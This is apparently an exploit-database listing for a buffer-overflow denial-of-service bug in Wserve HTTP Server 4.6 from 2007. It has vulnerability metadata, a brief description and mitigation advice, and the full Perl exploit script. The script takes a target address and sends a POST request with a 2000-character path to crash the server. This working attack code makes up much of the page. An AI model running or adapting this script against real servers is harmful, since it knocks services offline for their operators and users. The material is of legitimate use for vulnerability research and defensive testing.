header-logo
Suggest Exploit
vendor:
Wserve HTTP Server
by:
UniquE-Key
7.5
CVSS
HIGH
Buffer Overflow - Denial of Service
119
CWE
Product Name: Wserve HTTP Server
Affected Version From: 4.6
Affected Version To: 4.6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Wserve HTTP Server 4.6 Version (Long Directory Name) Buffer Overflow – Denial Of Service

This exploit is for the Wserve HTTP Server 4.6 version which is vulnerable to a buffer overflow attack. The attacker sends a specially crafted HTTP request with a long directory name, causing a buffer overrun. This results in a denial of service as the program's internal state gets corrupted and it cannot continue execution safely.

Mitigation:

The vendor should release a patch to fix this buffer overflow vulnerability. In the meantime, users are advised to use an alternative HTTP server software or implement network-level mitigations like firewalls to block potential attacks.
Source

Exploit-DB raw data:

#!perl
# Wserve HTTP Server 4.6 Version (Long Directory Name) Buffer Overflow - Denial Of Service
# Type :
# Buffer Overflow - Denial of Service
# Release Date :
# {2007-04-05}
# Product / Vendor :
# Wserve HTTP Server
# http://sourceforge.net/projects/whttp
# PoC :
# GET / HTTP/1.0\r\n /127.0.0.1:80/AAAAAA[2000]. 
# Error :
# Buffer Overrun Detected!
# Program:...~\Temp\Rar$EX00.906\wserve\wserve_console.exe
# A buffer overrun has been detected which has corrupted the program's internal state.The program cannot safely continue 
# execution and must now be terminated

# Exploit :

use LWP::UserAgent;

$unique = LWP::UserAgent->new;

$address = shift or die("Insert A Target");

$req = HTTP::Request->new(POST => "http://$address:80/" . A x 2000);

$res = $unique->request($req);

print $res->as_string;

# Tested :

# --- Wserve HTTP Server 4.6 ---

# Vulnerable :

# --- Wserve HTTP Server 4.6 ---

# Author :

# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org

# milw0rm.com [2007-04-05]